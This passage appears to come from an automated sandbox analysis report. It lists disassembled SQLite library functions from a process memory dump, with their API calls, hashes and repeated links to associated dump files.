Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
String ID:
API String ID: 3231710329-0
Opcode ID: dab91343f7685623adf39af172049b301927549c3f7c6367a046f71b9b20f855
Instruction ID: 47788e5f33ec456f6c09fe90a4d4cb6f4641ae93977c4009da6644d494cc06f8
Opcode Fuzzy Hash: dab91343f7685623adf39af172049b301927549c3f7c6367a046f71b9b20f855
Instruction Fuzzy Hash: 843103B09096499FCB10DFA8C48479EFBF1BF84314F24892DE488AB350D775E846CB81

Function 61E54DAA Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E54DBF
sqlite3_mutex_enter.SQLITE3 ref: 61E54DCA
sqlite3_mutex_leave.SQLITE3 ref: 61E54E83
sqlite3_mutex_leave.SQLITE3 ref: 61E54E8E

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_entersqlite3_mutex_leave
String ID:
API String ID: 1477753154-0
Opcode ID: 109188278f0261b27d99f54bf037e6bdeaa58851050547d468d154eef19e5076
Instruction ID: f7c8086cac2f6264260c3d3fb20fed7f14000897d240cb4eac16fb69381dfba0
Opcode Fuzzy Hash: 109188278f0261b27d99f54bf037e6bdeaa58851050547d468d154eef19e5076
Instruction Fuzzy Hash: 06214BB46087818BD741AF68C48465ABBE4EF8431CF24C41EE8888F305EB75D8B18B92

Function 61E355FC Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

sqlite3_initialize.SQLITE3 ref: 61E3560A
sqlite3_mutex_enter.SQLITE3 ref: 61E35626
sqlite3_mutex_leave.SQLITE3 ref: 61E35648
sqlite3_mutex_leave.SQLITE3 ref: 61E356BA
sqlite3_memory_used.SQLITE3 ref: 61E356BF

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_mutex_leave$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_enter
String ID:
API String ID: 3898154609-0
Opcode ID: be797cc2fe9ee55afcef7129445291e782658ebb29dd23c3a6fccfd5520f088c
Instruction ID: 8bcd8962c388af5c75a930e3aa68f6c78a1d20f8ceb6234f10f39b10fee7d10a
Opcode Fuzzy Hash: be797cc2fe9ee55afcef7129445291e782658ebb29dd23c3a6fccfd5520f088c
Instruction Fuzzy Hash: 69218075B10A218FCB049AADE89061D77E1FFC6618B24C66EE875CB340D631D982CB81

Function 61E9617B Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

sqlite3_mprintf.SQLITE3 ref: 61E961B2

Part of subcall function 61E42CCC: sqlite3_initialize.SQLITE3 ref: 61E42CD2
Part of subcall function 61E42CCC: sqlite3_vmprintf.SQLITE3 ref: 61E42CEC

sqlite3_prepare.SQLITE3 ref: 61E961DD
sqlite3_step.SQLITE3 ref: 61E961FB
sqlite3_finalize.SQLITE3 ref: 61E96219
sqlite3_free.SQLITE3 ref: 61E96224

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_finalizesqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_preparesqlite3_stepsqlite3_vmprintf
String ID:
API String ID: 2037377305-0
Opcode ID: 1fc717aaf13f7cd724e729d1918bfed5164acb5cb68ea662aa9bc16ed2ea096f
Instruction ID: a6a0ab87fe53682f5bcba662573690812736d0f654bb48538950b2cf90c68ba4
Opcode Fuzzy Hash: 1fc717aaf13f7cd724e729d1918bfed5164acb5cb68ea662aa9bc16ed2ea096f
Instruction Fuzzy Hash: 5321D8B4E087469BC710DFA9C18065EFBF4AF88614F25C92EE89897350E735D8418B91

Function 61EAF09F Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

sqlite3rebaser_create.SQLITE3 ref: 61EAF0AB

Part of subcall function 61EAEFF0: sqlite3_malloc.SQLITE3 ref: 61EAEFFE

sqlite3changegroup_add.SQLITE3 ref: 61EAF0C8

Part of subcall function 61EAEF03: sqlite3changeset_start.SQLITE3 ref: 61EAEF1E
Part of subcall function 61EAEF03: sqlite3changeset_finalize.SQLITE3 ref: 61EAEF3C

sqlite3changegroup_add.SQLITE3 ref: 61EAF0E5
sqlite3changegroup_output.SQLITE3 ref: 61EAF102
sqlite3changegroup_delete.SQLITE3 ref: 61EAF110

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3changegroup_add$sqlite3_mallocsqlite3changegroup_deletesqlite3changegroup_outputsqlite3changeset_finalizesqlite3changeset_startsqlite3rebaser_create
String ID:
API String ID: 1428585912-0
Opcode ID: ebf2b8a7f4f89f8514e58c7245491561f35ab2183f75e66101d90d319413ffdc
Instruction ID: c6be2178827cfd70f40cd5c3916185b6c1b77707875eb1a64410f88f9ab1d43b
Opcode Fuzzy Hash: ebf2b8a7f4f89f8514e58c7245491561f35ab2183f75e66101d90d319413ffdc
Instruction Fuzzy Hash: AA01E5B8A0574AAFCB40DFA9C58599EBBF4EF48248F11C86AEC94D7300E734E951CB51

Function 61EAF024 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

sqlite3rebaser_create.SQLITE3 ref: 61EAF030

Part of subcall function 61EAEFF0: sqlite3_malloc.SQLITE3 ref: 61EAEFFE

sqlite3changegroup_add_strm.SQLITE3 ref: 61EAF04D

Part of subcall function 61EAEF65: sqlite3changeset_start_strm.SQLITE3 ref: 61EAEF80
Part of subcall function 61EAEF65: sqlite3changeset_finalize.SQLITE3 ref: 61EAEF9E

sqlite3changegroup_add_strm.SQLITE3 ref: 61EAF06A
sqlite3changegroup_output_strm.SQLITE3 ref: 61EAF087
sqlite3changegroup_delete.SQLITE3 ref: 61EAF095

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3changegroup_add_strm$sqlite3_mallocsqlite3changegroup_deletesqlite3changegroup_output_strmsqlite3changeset_finalizesqlite3changeset_start_strmsqlite3rebaser_create
String ID:
API String ID: 3084451058-0
Opcode ID: c837c577a5bf3c1a3420d9c691df5222bf785064617502d38f3242c88049cb2c
Instruction ID: e5f3c1ad0ee7d68559fbc2b4b6c4e69ce1ea4da537758ec4c5bc9e5fb47bc8a2
Opcode Fuzzy Hash: c837c577a5bf3c1a3420d9c691df5222bf785064617502d38f3242c88049cb2c
Instruction Fuzzy Hash: 630113B890474AAFCB40DF69C58055EBBF4EF88344F11C869EC94DB300E734D9418B51

Function 61E36AB3 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 397COMMON

Download Yara Rule

APIs

Part of subcall function 61E0A017: memcmp.MSVCRT ref: 61E0A071

sqlite3_malloc64.SQLITE3 ref: 61E36CF7

Part of subcall function 61E36841: sqlite3_initialize.SQLITE3 ref: 61E3684C

sqlite3_free.SQLITE3 ref: 61E36EFB

Part of subcall function 61EB1E56: memcmp.MSVCRT ref: 61EB1E7F

sqlite3_log.SQLITE3 ref: 61E36FD2

Strings

, xrefs: 61E36BFC

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64
String ID:
API String ID: 334898065-3916222277
Opcode ID: 141fd7fa0c39a1e3e31a100d6fc76d554679e2a0014675a344917f83a0653db9
Instruction ID: eed182a8cc1797881159391a6b31030052597f2b4422f4079ccbbb784b53044c
Opcode Fuzzy Hash: 141fd7fa0c39a1e3e31a100d6fc76d554679e2a0014675a344917f83a0653db9
Instruction Fuzzy Hash: 1E020574E043A9CBEB14CFA9C88478DBBF1AF88308F248169D859AB345E775D985CF41

Function 61E191A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

sqlite3_str_append.SQLITE3 ref: 61E1921C
sqlite3_str_append.SQLITE3 ref: 61E19250

Strings

, xrefs: 61E19312
,, xrefs: 61E19336

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_append
String ID: $,
API String ID: 1074250351-71045815
Opcode ID: 3dcd613def5e7b5aabff3ad4b3e54fdc358b37c88bc524042749198a71a5b8b3
Instruction ID: 948482f733b7b571b846afeb4f6722d9a41ebf863a91dec99b2a1ab6ee3c1d69
Opcode Fuzzy Hash: 3dcd613def5e7b5aabff3ad4b3e54fdc358b37c88bc524042749198a71a5b8b3
Instruction Fuzzy Hash: 08A1867094C2A5CEEB218E68C8C63997FF1AB46708F28C4D5C498DB29AC775C9C5CF52

Function 61E2EEE8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 226COMMON

Download Yara Rule

APIs

sqlite3_value_text.SQLITE3 ref: 61E2EF9F

Strings

, xrefs: 61E2F116

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_text
String ID:
API String ID: 348685305-3916222277
Opcode ID: cf248c9463752a8bc2c517c92cad7ffa3933af29a642c6cc65387447dbaa16ac
Instruction ID: b1b282229106a6da0b83d249c753ad4de8cb468a49aa5de4d08b9002c59a05c4
Opcode Fuzzy Hash: cf248c9463752a8bc2c517c92cad7ffa3933af29a642c6cc65387447dbaa16ac
Instruction Fuzzy Hash: FA81C631A046558BEB01CFB9C5A0F5AB7F1AF89318F78C11EE85597345D738E882CB41

Function 61E59149 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

sqlite3_randomness.SQLITE3 ref: 61E59328

Strings

rowid, xrefs: 61E5923E
true, xrefs: 61E5925D
false, xrefs: 61E5926D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_randomness
String ID: false$rowid$true
API String ID: 2799796375-3897361736
Opcode ID: 6827283902796371455c1e2cea2263941480f3b04c94958b7d1aaa2f4ac8c47b
Instruction ID: 946b7d8b809d351d8b5ff7ea186dbc27592027ceb6489f89617bb330211aee0b
Opcode Fuzzy Hash: 6827283902796371455c1e2cea2263941480f3b04c94958b7d1aaa2f4ac8c47b
Instruction Fuzzy Hash: 688187B4A083498BEB40CFA9C58079DBBF1BF89748F24C42DD854AB392D776D856CB41

Function 61E2198C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

sqlite3_value_int.SQLITE3 ref: 61E219A8
sqlite3_value_int.SQLITE3 ref: 61E219B6
sqlite3_result_blob.SQLITE3 ref: 61E21A49

Strings

$, xrefs: 61E21A41

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_int$sqlite3_result_blob
String ID: $
API String ID: 2918918774-3993045852
Opcode ID: 077bfc741683a7c41ce3e8f959c0c75ffc96f46db7db805daa0ef43f059cd28b
Instruction ID: 87a38b360771b91f2a670debca455d95f83521af9b296cbb521554cc8af22217
Opcode Fuzzy Hash: 077bfc741683a7c41ce3e8f959c0c75ffc96f46db7db805daa0ef43f059cd28b
Instruction Fuzzy Hash: 52212BB4A0460A9FCB00DFA9D480689BBF0FF4C314F14856AE858DB300E734E951CFA1

Function 61E29C51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

sqlite3_value_text.SQLITE3 ref: 61E29C6B
sqlite3_value_text.SQLITE3 ref: 61E29C78
sqlite3_result_error.SQLITE3 ref: 61E29CCA

Strings

bua, xrefs: 61E29C80

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_result_error
String ID: bua
API String ID: 1240586553-3993766197
Opcode ID: 963c60f9df0a1818538ba19120d6f83975b2eca7844230d312492eeb08598eec
Instruction ID: 23ad18cae0894c186b32af56d563a52c674513e5d06cbf916579736918a751ab
Opcode Fuzzy Hash: 963c60f9df0a1818538ba19120d6f83975b2eca7844230d312492eeb08598eec
Instruction Fuzzy Hash: 231115B49087599FCB04DF69C58155ABBE1BFC9360F20C92EE8988B354D334C841CF92

Function 61E2D1EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D0A4: sqlite3_log.SQLITE3 ref: 61E2D0D6

sqlite3_mutex_enter.SQLITE3 ref: 61E2D21E
sqlite3_mutex_leave.SQLITE3 ref: 61E2D259

Part of subcall function 61E2C560: sqlite3_log.SQLITE3 ref: 61E2C589

Strings

out of memory, xrefs: 61E2D227, 61E2D263

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
String ID: out of memory
API String ID: 2575432037-2599737071
Opcode ID: e806bb6501d129123b0b2a3a55432886fd808e1ae229a0fcb701ea87911ed60b
Instruction ID: 535ca1414d2bf3a89963fb4f66d76bc0fca5e49ce2689c9680995cb4093fea72
Opcode Fuzzy Hash: e806bb6501d129123b0b2a3a55432886fd808e1ae229a0fcb701ea87911ed60b
Instruction Fuzzy Hash: 1D017175A492448BDB149FA9D9D06197BE4BF46728F28C4B9DE448F305E735D8408781

Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 61E01456
GetProcAddress.KERNEL32 ref: 61E01471

Strings

libgcj-16.dll, xrefs: 61E0144F
_Jv_RegisterClasses, xrefs: 61E01466

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-16.dll
API String ID: 1646373207-328863460
Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction ID: 910af9f81cc45c95203b64c3c210c9966fecf5fc45ba656f929556e66af3d80f
Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction Fuzzy Hash: A5E0EDB49157069BEB017FE5850633EBAF5AFC570AF72C46CD9808A294E670C4918763

Function 61E23C0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

sqlite3_create_module.SQLITE3 ref: 61E23C31
sqlite3_create_module.SQLITE3 ref: 61E23C57

Strings

xa, xrefs: 61E23C45
_a, xrefs: 61E23C3D

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_create_module
String ID: _a$xa
API String ID: 3989820615-3639960699
Opcode ID: 4914097dfb0dca18d3af27f33e3ede28e711d7fbd7396d60cb4a43233dfd53b8
Instruction ID: b40eae946f10551d8fc5e6037bd0c01df2a95e8760000092e0205358472e9b2f
Opcode Fuzzy Hash: 4914097dfb0dca18d3af27f33e3ede28e711d7fbd7396d60cb4a43233dfd53b8
Instruction Fuzzy Hash: CEE05974508305AFC700EF65D15674EBBE4EF84698F60C81DE8899B384E774D580CF82

Function 61E1403E Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

